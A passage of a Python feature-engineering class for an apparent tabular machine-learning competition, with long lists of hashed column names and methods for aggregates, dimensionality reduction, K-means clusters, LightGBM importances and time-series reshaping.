'a78f85d49', '8de6fcbf1', '3ecc09859', 'f0317ca4f', '402b0d650', '7e78d546b', '2ad744c57', '47abb3cb4', '71ac2b961', '5b8c88c94', '293e2698e', '4bdeca0d2', '2ef8b7f4f', 'c380056bb', '2488e17f5', '20442bac4', '8e8736fc8', '8a4c53d3e', '62c547c8e', '86f13324d', 'da52febdb', '64e38e7a2', 'b0310a768', '0d866c3d7', '34a2f580b', '24bcc2f15', 'e1e8947d8', '05f11f48f', '8c8616b62', '79e0c374a', 'ad1466df8', 'f642213a6', 'f8405f8b9', '1ae0db9d5', '9dbb6b717', '0f7ae26ce', '81ec47b4c', 'ad4e33a4c', 'a78f85d49', '8de6fcbf1', '3ecc09859', 'd2ef684ed', '9e39c29d0', 'f1eeb56ae', '62ffce458', '497adaff8', 'ed1d5d137', 'faf7285a1', 'd83da5921', '0231f07ed', '7950f4c11', '051410e3d', '39e1796ab', '2e0148f29', '312832f30', '6f113540d', 'f3ee6ba3c', 'd9fc63fa1', '6a0b386ac', '5747a79a9', '64bf3a12a', 'c110ee2b7', '1bf37b3e2', 'fdd07cac1', '0872fe14d', 'ddef5ad30', '42088cf50', 
'3519bf4a4', 'a79b1f060', '97cc1b416', 'b2790ef54', '1a7de209c', '2a71f4027', 'f118f693a', '15e8a9331', '0c545307d', '363713112', '73e591019', '21af91e9b', '62a915028', '2ab5a56f5', 'a8ee55662', '316b978cd', 'f3cf9341c', 'fa11da6df', 'd47c58fe2', '0d5215715', '555f18bd3', '134ac90df', '716e7d74d', 'c00611668', '1bf8c2597', '1f6b2bafa', '174edf08a', 'f1851d155', '5bc7ab64f', 'a61aa00b0', 'b2e82c050', '26417dec4', '53a550111', '51707c671', 'e8d9394a0', 'cbbc9c431', '6b119d8ce', 'f296082ec', 'be2e15279', '698d05d29', '38e6f8d32', '93ca30057', '7af000ac2', '1fd0a1f2a', '41bc25fef', '0df1d7b9a', '88d29cfaf', '2b2b5187e', 'bf59c51c3', 'cfe749e26', 'ad207f7bb', '11114a47a', '341daa7d1', 'a8dd5cea5', '7b672b310', 'b88e5de84', 'fec5644cf', 'caa9883f6', '9437d8b64', '68811ba58', 'ef4b87773', 'ff558c2f2', '8d918c64f', '0b8e10df6', '2d6565ce2', '0fe78acfa', 'b75aa754d', '2ab9356a0', '4e86dd8f3', '348aedc21', 'd7568383a', '856856d94', '69900c0d1', '02c21443c', '5190d6dca', '20551fa5b', '79cc300c7', '8d8276242', 'da22ed2b8', '89cebceab', 'f171b61af', '3a07a8939', '129fe0263', 'e5b2d137a', 'aa7223176', '5ac7e84c4', '9bd66acf6', '4c938629c', 'e62c5ac64', '57535b55a', 'a1a0084e3', '2a3763e18', '474a9ec54', '0741f3757', '4fe8b17c2', 'd5754aa08'] # noqa 501 # features = ['f190486d6', '58e2e02e6', 'eeb9cd3aa', '9fd594eec', '6eef030c1', '15ace8c9f', 'fb0f5dbfe', '58e056e12', '20aa07010', '024c577b9', 'd6bb78916', 'b43a7cfd5', '58232a6fb', '1702b5bf0', '324921c7b', '62e59a501', '2ec5b290f', '241f0f867', 'fb49e4212', '66ace2992', 'f74e8f13d', '5c6487af1', '963a49cdc', '26fc93eb7', '1931ccfdd', '703885424', '70feb1494', '491b9ee45', '23310aa6f', 'e176a204a', '6619d81fc', '1db387535', 'fc99f9426', '91f701ba2', '0572565c2', '190db8488', 'adb64ff71', 'c47340d97', 'c5a231d81', '0ff32eb98'] # noqa 501 if dataset == 'test' or dataset == 'both': new_test_df = self.test_df.filter(items=features) if not return_only: self.test_df = new_test_df if dataset == 'train' or dataset == 'both': 
features.append('target') new_train_df = self.train_df.filter(items=features) if not return_only: self.train_df = new_train_df if return_only: if dataset == 'train': return new_train_df elif dataset == 'test': return new_test_df elif dataset == 'both': return new_train_df, new_test_df def to_sparse(self, dataset='both', verbose=True): '''Transform datasets to sparse by removing zeros''' if dataset == 'train' or dataset == 'both': if verbose: print('Dense memory usage: train = {}mb'.format( self.train_df.memory_usage().sum() / 1024 / 1024)) self.train_df = self.train_df.replace(0, np.nan) if verbose: print('Sparse memory usage: train = {}mb'.format( self.train_df.memory_usage().sum() / 1024 / 1024)) if dataset == 'test' or dataset == 'both': if verbose: print('Dense memory usage: test = {}mb'.format( self.test_df.memory_usage().sum() / 1024 / 1024)) self.test_df = self.test_df.replace(0, np.nan) if verbose: print('Sparse memory usage: test = {}mb'.format( self.test_df.memory_usage().sum() / 1024 / 1024)) def normalize_data(self, x, fit=True, verbose=True): '''Normalize data taking sparsity into account''' if fit: self.scaler.fit(x) x = self.scaler.transform(x) if verbose: print('Data normalized.') return x def reduce_dimensionality(self, dataset, n_components=None, red_num=None, method='svd', fit=True, normalize=False, verbose=True): '''Reduce #red_num of features from the dataset''' assert method in ['svd', 'srp', 'fa'] if dataset == 'train': x = self.train_df.drop(["target"], axis=1).values if normalize: x = self.normalize_data(x, fit=True) elif dataset == 'test': x = self.test_df.values if normalize: x = self.normalize_data(x, fit=False) if n_components is None: n_components = x.shape[0] - red_num elif n_components == -1: n_components = 'auto' red_num = 'Unkown' else: red_num = x.shape[0] - n_components # When reducing test data fit must be False if fit: if method == 'svd': self.reductor = TruncatedSVD(n_components=n_components) elif method == 'srp': 
self.reductor = SparseRandomProjection( n_components=n_components) elif method == 'fa': self.reductor = FactorAnalysis(n_components=n_components) self.reductor.fit(x) x = self.reductor.transform(x) if verbose: print(red_num, ' less important features removed.') print('Data new shape: ', x.shape) return x def add_decomposition_as_features(self, dataset='both', n_components=None, method='svd', comp_stats=False, verbose=True, normalize=False): '''Perform feature decomposition and add as an aggregate''' if dataset == 'train' or dataset == 'both': train_agg = self.reduce_dimensionality( dataset='train', n_components=n_components, method=method, fit=True, normalize=normalize, verbose=verbose) train_agg = pd.DataFrame(train_agg, index=self.train_df.index) self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if comp_stats: train_agg = compute_row_aggregates(train_agg, prefix='dec') self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': test_agg = self.reduce_dimensionality( dataset='test', n_components=n_components, method=method, fit=False, normalize=normalize, verbose=verbose) test_agg = pd.DataFrame(test_agg, index=self.test_df.index) self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) if comp_stats: test_agg = compute_row_aggregates(test_agg, prefix='dec') self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def get_most_important_features(self, num=50, importance_type='split', random_seed=43): '''Get the column names for the most important features''' assert importance_type in ['split', 'gain'] LightGBM_params = dict(num_leaves=53, lr=0.005, bagging_fraction=0.67, max_depth=8, min_sum_hessian_in_leaf=1e-1, feature_fraction=0.35, bagging_freq=3, min_data_in_leaf=12, use_missing=True, zero_as_missing=True, lambda_l1=0.1, lambda_l2=1, device='cpu', num_threads=8) model = LightGBM(**LightGBM_params) x, y = self.get_train_data(use_aggregates=False) x_train, x_val, y_train, y_val = 
train_test_split( x, y, test_size=0.2, random_state=random_seed) model.fit(x_train, y_train, x_val, y_val, verbose=0) most_important = model.model.feature_importance( importance_type=importance_type) index = np.argsort(most_important)[-num:] return index def compute_aggregates_for_all_features(self, dataset): '''Compute aggregates for all features''' if dataset == 'train' or dataset == 'both': train_agg = compute_row_aggregates( self.train_df.drop(["target"], axis=1), prefix='global') # Add to aggregates self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': test_agg = compute_row_aggregates( self.test_df, prefix='global') # Add to aggregates self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def compute_time_series_aggregates(self, dataset): if dataset == 'train' or dataset == 'both': x, _ = self.get_data_as_time_series(dataset='train') for i in range(x.shape[2]): if i > 0: continue df = pd.DataFrame(x[:, :, i], index=self.train_df.index) train_agg = compute_TS_aggregates(df, prefix='ts') # Add to aggregates self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': x = self.get_data_as_time_series(dataset='test') for i in range(x.shape[2]): if i > 0: continue df = pd.DataFrame(x[:, :, i], index=self.test_df.index) test_agg = compute_TS_aggregates(df, prefix='ts') # Add to aggregates self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def compute_aggregates_for_selected_features(self, dataset): '''Compute aggregate features for the hand selected features''' if dataset == 'train' or dataset == 'both': df = self.keep_only_selected_features('train', return_only=True) train_agg = compute_row_aggregates( df.drop('target', axis=1), prefix='hand_picked') # Add to aggregates self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': df = self.keep_only_selected_features('test', return_only=True) test_agg = 
compute_row_aggregates( df, prefix='hand_picked') # Add to aggregates self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def compute_aggregates_for_most_important(self, dataset, num=50, importance_type='split', random_seed=43): '''Compute aggregate features for the most important features''' index = self.get_most_important_features(num, importance_type, random_seed) if dataset == 'train' or dataset == 'both': features = self.train_df.drop('target', axis=1).values[:, index] df = pd.DataFrame(features, index=self.train_df.index) train_agg = compute_row_aggregates( df, prefix='{}_most_important'.format(num)) # Add to aggregates self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': features = self.test_df.values[:, index] df = pd.DataFrame(features, index=self.test_df.index) test_agg = compute_row_aggregates( df, prefix='{}_most_important'.format(num)) # Add to aggregates self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def compute_meta_aggregates(self, dataset='both'): '''Compute aggregate features for the existing aggregate features''' if dataset == 'train' or dataset == 'both': train_agg = compute_row_aggregates( self.train_agg, prefix='meta') self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': test_agg = compute_row_aggregates( self.test_agg, prefix='meta') self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def compute_cluster_features(self, dataset='both', iter_cluster=range(2, 11)): '''Compute cluster centers using K-means''' for n_cluster in iter_cluster: if dataset == 'train' or dataset == 'both': features = self.compute_Kmeans('train', n_cluster, fit=True) train_agg = pd.DataFrame( {'clusterIndex{}'.format(n_cluster): features}, index=self.train_df.index) self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': features = self.compute_Kmeans('test', n_cluster, fit=False) 
test_agg = pd.DataFrame( {'clusterIndex{}'.format(n_cluster): features}, index=self.test_df.index) self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def compute_Kmeans(self, dataset, n_cluster, fit=True, verbose=True): '''Compute K_means algorithm on data''' if dataset == 'train': X = self.train_df.drop('target', axis=1).values elif dataset == 'test': X = self.test_df.values if fit: self.clusterizer = KMeans(n_clusters=n_cluster, n_jobs=-2) self.clusterizer.fit(X) cluster_index = self.clusterizer.predict(X) # cluster_centers = self.clusterizer.cluster_centers_ # cluster_feat = np.array([cluster_centers[x, :] for x in # cluster_index]) if verbose: print('Clusters inertia: ', self.clusterizer.inertia_) return cluster_index def create_feature_as_targets(self): '''Create new target using arg of the feat closer to target''' for index, row in self.train_df.iterrows(): target = row.pop('target') dists = abs(row.values - target) self.train_df.at[index, 'target'] = np.argmin(dists) def get_gibas_pred(self, dataset='train'): # Need more features!!! Note that if we use if dataset == 'train': data = self.train_df elif dataset == 'test': data = self.test_df features = ['f190486d6', '58e2e02e6', 'eeb9cd3aa', '9fd594eec', '6eef030c1', '15ace8c9f', 'fb0f5dbfe', '58e056e12', '20aa07010', '024c577b9', 'd6bb78916', 'b43a7cfd5', '58232a6fb', '1702b5bf0', '324921c7b', '62e59a501', '2ec5b290f', '241f0f867', 'fb49e4212', '66ace2992', 'f74e8f13d', '5c6487af1', '963a49cdc', '26fc93eb7', '1931ccfdd', '703885424', '70feb1494', '491b9ee45', '23310aa6f', 'e176a204a', '6619d81fc', '1db387535'] d1 = data[features[:-2] ].apply(tuple, axis=1).to_frame().rename(columns={0: 'key'}) d2 = data[features[2:]].apply( tuple, axis=1).to_frame().rename(columns={0: 'key'}) d2['pred'] = data[features[0]] d2 = d2[d2['pred'] != 0] # Keep? d3 = d2[~d2.duplicated(['key'], keep='first')] # Need more features! 
d = d1.merge(d3, how='left', on='key') pred = d.pred.fillna(0) log_pred = np.log1p(d.pred).fillna(0) have_data = log_pred != 0 if dataset == 'train': error = sqrt(mean_squared_error( np.log1p(self.train_df.reset_index().target[have_data]), log_pred[have_data])) print( f'Score={error} on {have_data.sum()} out of {self.train_df.shape[0]} training samples') elif dataset == 'test': print(f'Have predictions for {have_data.sum()} out of {self.test_df.shape[0]} test samples') return pred def get_data_as_time_series(self, dataset='train', logloss=True, round_targets=False): '''Get data as time-series using selected features''' cols = [('f190486d6', '58e2e02e6', 'eeb9cd3aa', '9fd594eec', '6eef030c1', '15ace8c9f', 'fb0f5dbfe', '58e056e12', '20aa07010', '024c577b9', 'd6bb78916', 'b43a7cfd5', '58232a6fb', '1702b5bf0', '324921c7b', '62e59a501', '2ec5b290f', '241f0f867', 'fb49e4212', '66ace2992', 'f74e8f13d', '5c6487af1', '963a49cdc', '26fc93eb7', '1931ccfdd', '703885424', '70feb1494', '491b9ee45', '23310aa6f', 'e176a204a', '6619d81fc', '1db387535', 'fc99f9426', '91f701ba2', '0572565c2', '190db8488', 'adb64ff71', 'c47340d97', 'c5a231d81', '0ff32eb98'), ('06148867b', '4ec3bfda8', 'a9ca6c2f4', 'bb0408d98', '1010d7174', 'f8a437c00', '74a7b9e4a', 'cfd55f2b6', '632fed345', '518b5da24', '60a5b79e4', '3fa0b1c53', 'e769ee40d', '9f5f58e61', '83e3e2e60', '77fa93749', '3c9db4778', '42ed6824a', '761b8e0ec', 'ee7fb1067', '71f5ab59f', '177993dc6', '07df9f30c', 'b1c5346c4', '9a5cd5171', 'b5df42e10', 'c91a4f722', 'd93058147', '20a325694', 'f5e0f4a16', '5edd220bc', 'c901e7df1', 'b02dfb243', 'bca395b73', '1791b43b0', 'f04f0582d', 'e585cbf20', '03055cc36', 'd7f15a3ad', 'ccd9fc164'), ('0d7692145', '62071f7bc', 'ab515bdeb', 'c30c6c467', 'eab76d815', 'b6ee6dae6', '49063a8ed', '4cb2946ce', '6c27de664', '772288e75', 'afd87035a', '44f2f419e', '754ace754', 'e803a2db0', 'c70f77ef2', '65119177e', '3a66c353a', '4c7768bff', '9e4765450', '24141fd90', 'dc8b7d0a8', 'ba499c6d9', '8b1379b36', '5a3e3608f', 
'3be3c049e', 'a0a3c0f1b', '4d2ca4d52', '457bd191d', '6620268ab', '9ad654461', '1a1962b67', '7f55b577c', '989d6e0f5', 'bc937f79a', 'e059a8594', '3b74ac37b', '555265925', 'aa37f9855', '32c8b9100', 'e71a0278c'), ('0f8d7b98e', 'c30ff7f31', 'ac0e2ebd0', '24b2da056', 'bd308fe52', '476d95ef1', '202acf9bd', 'dbc0c19ec', '06be6c2bb', 'd8296080a', 'f977e99dc', '2191d0a24', '7db1be063', '1bc285a83', '9a3a1d59b', 'c4d657c5b', 'a029667de', '21bd61954', '16bf5a9a2', '0e0f8504b', '5910a3154', 'ba852cc7a', '685059fcd', '21d6a4979', '78947b2ad', '1435ecf6b', '3839f8553', 'e9b5b8919', 'fa1dd6e8c', '632586103', 'f016fd549', 'c25ea08ba', '7da54106c', 'b612f9b7e', 'e7c0a50e8', '29181e29a', '395dbfdac', '1beb0ce65', '04dc93c58', '733b3dc47'), ('1847c8140', '4adae02ea', '06f44eb79', '63dfd4552', '2a1f6c7f9', 'b3655056c', '7a5460b56', '8909db7d5', 'b0e2acd8e', '7cb53a29a', '5d5c5ce6d', 'a5874086d', '281c556a6', '04fe69e6a', 'e421c414e', '87e6b35f2', '1de239e78', 'c65451871', 'b136976cc', 'baa676f41', '82f194d54', 'f3b9c0b95', '2a83c3267', '802ee804e', '99b88d0fd', 'a257e4bb9', '741684fb0', 'fae0ce474', '16d7bff2b', '0d6d7ec0b', 'bdadd6c34', 'b6623bacf', 'a77b4afa4', '03490ef8c', 'f0aec6c6b', '7b6e769e4', 'ce6349807', '1602cb35d', '279d380ce', '63895c382'), ('18cad608c', '05f1b68b8', '9e0c57b34', '414b74eaa', '3b6f67b0e', '372daeab0', 'ec827621a', '44d132265', '850d3a6f5', '440d789c5', 'e9c45d66f', '615cc4c17', 'ca04a07ca', '4685cc47b', '6cf9184bb', '3dc46e323', '0106dd950', '3855aef1e', 'c9eda7d9c', 'ac308c9a3', '964cd68bc', 'f23b7530c', '7250feb72', '6809065b9', 'c7fd9abc6', '06a1c3b47', '39896d3dd', '10f17bd3e', '6984f4045', 'ed8ff54b5', '42b407f0d', '5509e2e98', 'c593d73e8', 'd3245937e', 'cbeddb751', '0f81cc1d2', '22b3971f5', 'ff3ebf76b', '76a75bd91', '258412544'), ('1ad24da13', '8c5025c23', 'f52a82e7f', 'c0b22b847', 'd75793f21', '4cffe31c7', '6c2d09fb1', 'fb42abc0d', '206ba1242', '62f61f246', '1389b944a', 'd15e80536', 'fa5044e9e', 'a0b0a7dbf', '1ff6be905', '4e06c5c6d', '1835531cd', 
'68b647452', 'c108dbb04', '58e8e2c82', 'f3bfa96d5', 'f2db09ac3', '4e8196700', '8cd9be80e', '83fc7f74c', 'dbc48d37c', '2028e022d', '17e160597', 'eb8cbd733', 'addb3f3eb', '460744630', '9108ee25c', 'b7950e538', 'a7da4f282', '7f0d863ba', 'b7492e4eb', '24c41bd80', 'fd7b0fc29', '621f71db3', '26f222d6d'), ('1d9078f84', '64e483341', 'a75d400b8', '4fe8154c8', '29ab304b9', '20604ed8f', 'bd8f989f1', 'c1b9f4e76', '4824c1e90', '4ead853dc', 'b599b0064', 'd26279f1a', '58ed8fb53', 'ff65215db', '402bb0761', '74d7998d4', 'c7775aabf', '9884166a7', 'beb7f98fd', 'fd99c18b5', 'd83a2b684', '18c35d2ea', '0c8063d63', '400e9303d', 'c976a87ad', '8a088af55', '5f341a818', '5dca793da', 'db147ffca', '762cbd0ab', 'fb5a3097e', '8c0a1fa32', '01005e5de', '47cd6e6e4', 'f58fb412c', 'a1db86e3b', '50e4f96cf', 'f514fdb2e', '7a7da3079', 'bb1113dbb'), ('20868afc1', 'a46587cda', 'acdef5318', 'a72fcabd8', '21216a0a8', 'dd16bb1ff', '3b8208d28', 'a8c320153', '4a6f8b2c1', 'ac2392a17', '08565b519', '6035df6d8', '4b2316bd5', 'bc3f77679', '51ebff825', '43727fb35', 'c0d363088', 'fd1187d68', '207871d87', '7e0fd6d92', 'f4e243e21', '037a54e89', 'cfa24e4be', 'd7f1f9e52', '6760927a0', '0d8f892fe', '09e395f05', 'bcc18dd40', '0f5fb7fe7', 'f10717d56', '717039eef', '41fb39de4', '965fa6747', '75e55b7a9', 'ff08cfbbe', '9e88cfd02', 'df3ac443c', '7acda93e6', '62e587225', 'd313c892b'), ('2135fa05a', 'e8a3423d6', '90a438099', '7ad6b38bd', '60e45b5ee', '2b9b1b4e2', 'd6c82cd68', '923114217', 'b361f589e', '04be96845', 'ee0b53f05', '21467a773', '47665e3ce', 'a6229abfb', '9666bfe76', '7dcc40cda', '17be6c4e7', 'a89ab46bb', '9653c119c', 'cc01687d0', '60e9cc05b', 'ffcec956f', '51c250e53', '7344de401', 'a15b2f707', 'a8e607456', 'dbb8e3055', '2a933bcb8', 'b77bc4dac', '58d9f565a', '17068424d', '7453eb289', '027a2206a', '343042ed9', 'c8fb3c2d8', '29eddc376', '1c873e4a6', '588106548', '282cfe2ad', '358dc07d0'), ('266525925', '4b6dfc880', '2cff4bf0c', 'a3382e205', '6488c8200', '547d3135b', 'b46191036', '453128993', '2599a7eb7', '2fc60d4d9', 
'009319104', 'de14e7687', 'aa31dd768', '2b54cddfd', 'a67d02050', '37aab1168', '939cc02f5', '31f72667c', '6f951302c', '54723be01', '4681de4fd', '8bd53906a', '435f27009', 'f82167572', 'd428161d9', '9015ac21d', 'ec4dc7883', '22c7b00ef', 'd4cc42c3d', '1351bf96e', '1e8801477', 'b7d59d3b5', 'a459b5f7d', '580f5ff06', '39b3c553a', '1eec37deb', '692c44993', 'ce8ce671e', '88ef1d9a8', 'bf042d928'), ('2d60e2f7a', '11ad148bd', '54d3e247f', 'c25438f10', 'e6efe84eb', '964037597', '0196d5172', '47a8de42e', '6f460d92f', '0656586a4', '22eb11620', 'c3825b569', '6aa919e2e', '086328cc6', '9a33c5c8a', 'f9c3438ef', 'c09edaf01', '85da130e3', '2f09a1edb', '76d34bbee', '04466547a', '3b52c73f5', '1cfb3f891', '704d68890', 'f45dd927f', 'aba01a001', 'c9160c30b', '6a34d32d6', '3e3438f04', '038cca913', '504c22218', '56c679323', '002d634dc', '1938873fd', 'd37030d36', '162989a6d', 'e4dbe4822', 'ad13147bd', '4f45e06b3', 'ba480f343'), ('32313055b', '1cec80910', 'd5de50af2', 'd08c4204c', 'dbf75ea9f', 'b93c33953', '425c08bf3', '015c3e354', '26419fa97', '0b9a18ebf', 'bbd7e6282', '6fec5a793', 'e4eac6fc5', '99ea04b86', '24292d615', '72ad5471c', '2f489369f', '35d9497eb', '42d321127', '48aa6d627', '94516b63e', '55d7eb6d2', '8dbd95b8d', '1d2df346e', '181e91b1c', '4a29bc92b', '0f14ab429', '22b3a9853', 'defcc2c50', '6a9e2b09d', '42b795e64', 'b65627fab', '7af2b8f44', '1ce5f7bde', 'dd2fc85d7', '013127235', '916d17652', 'a697e9248', '24addf864', 'a63aaf7cc'), ('3391c0af1', 'd8e951a15', '320c3880a', '37bd241bb', 'ef6fab1bc', '39d765b49', 'c0f2800fc', '9401c82a9', '6f9d256a9', 'f967f827b', '798a8e92e', '1e991f09b', '77854931e', '0024cd760', 'ab7b12083', '7b8ac394f', 'd8aa77bcc', '54b3d6afc', '4c6a1accd', '0a7ef2f9b', 'dc3b4460b', '83ce5d80d', '7e293fbaf', '8d468092c', 'dc0118d47', '9f8df01bd', '3f02111a8', 'bf0195c11', '28bc37378', '05410a84f', 'ecdc88e4b', '8d9263a24'), ('3391c0af1', 'd8e951a15', '320c3880a', '37bd241bb', 'ef6fab1bc', '39d765b49', 'c0f2800fc', '9401c82a9', '6f9d256a9', 'f967f827b', '798a8e92e', 
'1e991f09b', '77854931e', '0024cd760', 'ab7b12083', '7b8ac394f', 'd8aa77bcc', '54b3d6afc', '4c6a1accd', '0a7ef2f9b', 'dc3b4460b', '83ce5d80d', '7e293fbaf', '8d468092c', 'dc0118d47', '9f8df01bd', '3f02111a8', 'bf0195c11', '28bc37378', '05410a84f', 'ecdc88e4b', '8d9263a24', 'e234cdc9b', '380d54fad', '7f17e0b2a', '03e726456', '8f66157e3', '556fb6bc0', '2d2114d9b', '215ffb087'), ('3b843ae7e', 'c8438b12d', 'd1b9fc443', '19a45192a', '63509764f', '6b6cd5719', 'b219e3635', '4b1d463d7', '4baa9ff99', 'b0868a049', '3e3ea106e', '043e4971a', 'a2e5adf89', '25e2bcb45', '3ac0589c3', '413bbe772', 'e23508558', 'c1543c985', '2dfea2ff3', '9dcdc2e63', '1f1f641f1', '75795ea0a', 'dff08f7d5', '914d2a395', '00302fe51', 'c0032d792', '9d709da93', 'cb72c1f0b', '5cf7ac69f', '6b1da7278', '47b5abbd6', '26163ffe1', '902c5cd15', '45bc3b302', '5c208a931', 'e88913510', 'e1d6a5347', '38ec5d3bb', 'e3d64fcd7', '199d30938'), ('4302b67ec', '75b663d7d', 'fc4a873e0', '1e9bdf471', '86875d9b0', '8f76eb6e5', '3d71c02f0', '05c9b6799', '26df61cc3', '27a7cc0ca', '9ff21281c', '3ce93a21b', '9f85ae566', '3eefaafea', 'afe8cb696', '72f9c4f40', 'be4729cb7', '8c94b6675', 'ae806420c', '63f493dba', '5374a601b', '5291be544', 'acff85649', '3690f6c26', '26c68cede', '12a00890f', 'dd84964c8', 'a208e54c7', 'fb06e8833', '7de39a7eb', '5fe3acd24', 'e53805953', '3de2a9e0d', '2954498ae', '6c3d38537', '86323e98a', 'b719c867c', '1f8a823f2', '9cc5d1d8f', 'd3fbad629'), ('44df9c106', 'c768b2fbd', 'ca667c723', '1a9b9e2fe', 'e3a41c199', '1529e64f6', '2af3668d1', '85505df26', 'b488b6a67', '4e593c1c5', '47aab5d12', 'b0c596a35', '2127bb611', 'c8c4ef2e5', '665493ecc', '235163358', '932d0f56b', '9ce50845b', 'aca96197c', '74fa547c6', 'b6636b458', '95bbebdd4', 'de0aaf6f4', '7106396d7', 'fb2ab1513', '346c04a64', '5271beb00', 'e8b599c85', 'de5e5b296', '90e069c70', 'a939664aa', 'e8f43b3ab', 'df5f5272a', 'df3cf10bd', '71659d45d', '03b8b1f2d', '860a95ef6', '7f174450b', 'bbbff9657', '1d9b78b9c'), ('4569d5378', '22f05c895', '5fad07863', 'f32763afc', 
'9bb02469c', '61063fa1c', '4a93ad962', 'fa1efdadd', '4ef309fc3', 'ed0860a34', '6ae0787f3', 'ffd50f0bf', '704e2dc55', '1b1a893f5', 'b19e65a65', '8d4b52f9a', '85dcc913d', '92ba988e1', '6d46740f1', '0aab2f918', '6610f90f1', 'a235f5488', 'c5c073bb0', '13f7f9c70', 'fb6da0420', '73361d959', '783ee6e9a', '635fbbd2c', '60cd556c9', '150504397', 'f3b6dabf7', 'd92ea0b2a', 'b904b8345', '78bc2558b', '4e1a8f6eb', 'c89ae4ce0', 'f2af9300f', 'ca25aad9f', '9d435a85b', '8d035d41e'), ('48b839509', '2b8851e90', '28f75e1a5', '0e3ef9e8f', '37ac53919', '7ca10e94b', '4b6c549b1', '467aa29ce', '74c5d55dc', '0700acbe1', '44f3640e4', 'e431708ff', '097836097', 'd1fd0b9c2', 'a0453715a', '9e3aea49a', '899dbe405', '525635722', '87a2d8324', 'faf024fa9', 'd421e03fd', '1254b628a', 'a19b05919', '34a4338bc', '08e89cc54', 'a29c9f491', 'a0a8005ca', '62ea662e7', '5fe6867a4', '8b710e161', '7ab926448', 'd04e16aed', '4e5da0e96', 'ff2c9aa8f', 'b625fe55a', '7124d86d9', '215c4d496', 'b6fa5a5fd', '55a7e0643', '0a26a3cfe'), ('5030aed26', 'b850c3e18', '212efda42', '9e7c6b515', '2d065b147', '49ca7ff2e', '37c85a274', 'ea5ed6ff7', 'deabe0f4c', 'bae4f747c', 'ca96df1db', '05b0f3e9a', 'eb19e8d63', '235b8beac', '85fe78c6c', 'cc507de6c', 'e0bb9cf0b', '80b14398e', '9ca0eee11', '4933f2e67', 'fe33df1c4', 'e03733f56', '1d00f511a', 'e62cdafcf', '3aad48cda', 'd36ded502', '92b13ebba', 'f30ee55dd', '1f8754c4e', 'db043a30f', 'e75cfcc64', '5d8a55e6d', '6e29e9500', 'c5aa7c575', 'c2cabb902', 'd251ee3b4', '73700eaa4', '8ab6f5695', '54b1c1bc0', 'cbd0256fb'), ('50603ae3d', '48282f315', '090dfb7e2', '6ccaaf2d7', '1bf2dfd4a', '50b1dd40f', '1604c0735', 'e94c03517', 'f9378f7ef', '65266ad22', 'ac61229b6', 'f5723deba', '1ced7f0b4', 'b9a4f06cd', '8132d18b8', 'df28ac53d', 'ae825156f', '936dc3bc4', '5b233cf72', '95a2e29fc', '882a3da34', '2cb4d123e', '0e1921717', 'c83d6b24d', '90a2428a5', '67e6c62b9', '320931ca8', '900045349', 'bf89fac56', 'da3b0b5bb', 'f06078487', '56896bb36', 'a79522786', '71c2f04c9', '1af96abeb', '4b1a994cc', 'dee843499', 
'645b47cde', 'a8e15505d', 'cc9c2fc87'), ('509e911f0', '9c36a77b3', '50aaba7f1', 'ed5af35f0', 'ffd2f9409', 'd6a122efd', '30768bc79', '9161061c9', '1fbbd4edf', '9a179ed71', '6a055c4fb', '61efa1e29', 'e171bccbe', 'd7cdd8aef', 'd168174c7', 'b791ce9aa', '1a82869a6', '3696a15a7', '7b31055f1', 'a76ad8513', '82ba7a053', '37426563f', 'ba5bbaffc', 'd3022e2f1', '0ccd5ff1c', '31a3f920c', '86eb6ec85', '38df6c628', 'f1fbe249b', '6d0d72180', '22dbe574a', '5860d7fa9', '455f29419', 'f269ec9c8', '75aad4520', '18c0b76e9', 'dae4d14b4', '0cad4d7af', '1e1cb47f3', '9d6410ef5'), ('51c141e64', '0e348d340', '64e010722', '55a763d90', '13b54db14', '01fdd93d3', '1ec48dbe9', 'cf3841208', 'd208491c8', '90b0ed912', '633e0d42e', '9236f7b22', '0824edecb', '71deb9468', '1b55f7f4d', '377a76530', 'c47821260', 'bf45d326d', '69f20fee2', 'd6d63dd07', '5ab3be3e1', '93a31829f', '121d8697e', 'f308f8d9d', '0e44d3981', 'ecdef52b2', 'c69492ae6', '58939b6cc', '3132de0a3', 'a175a9aa4', '7166e3770', 'abbde281d', '23bedadb2', 'd4029c010', 'fd99222ee', 'bd16de4ba', 'fb32c00dc', '12336717c', '2ea42a33b', '50108b5b5'), ('53aa182a2', '4e92107c6', '295408598', 'b76bf3f19', '3305c8063', 'd3a116347', 'ac5260727', '199caef5d', '97ea72529', '1d4d5cd4a', '8fc7efaf0', '225fa9d61', '94f3dcaee', '4634c8fae', '660fdbc58', '052f633c1', '657dec16b', '7fa5bc19f', '7207afb67', 'cda277b2a', 'e9a473fbb', '3eac9a76e', '1c554649c', '86ffb104c', 'b14d5014b', '8348ea8d3', 'e3a4596f9', '49db469f5', 'f928893ca', 'aa610feec', 'fa2a340da', '652142369'), ('53aa182a2', '4e92107c6', '295408598', 'b76bf3f19', '3305c8063', 'd3a116347', 'ac5260727', '199caef5d', '97ea72529', '1d4d5cd4a', '8fc7efaf0', '225fa9d61', '94f3dcaee', '4634c8fae', '660fdbc58', '052f633c1', '657dec16b', '7fa5bc19f', '7207afb67', 'cda277b2a', 'e9a473fbb', '3eac9a76e', '1c554649c', '86ffb104c', 'b14d5014b', '8348ea8d3', 'e3a4596f9', '49db469f5', 'f928893ca', 'aa610feec', 'fa2a340da', '652142369', 'f81908ca5', '947c7c3e8', '8160230fd', 'c2d200f0e', 'c99902a93', 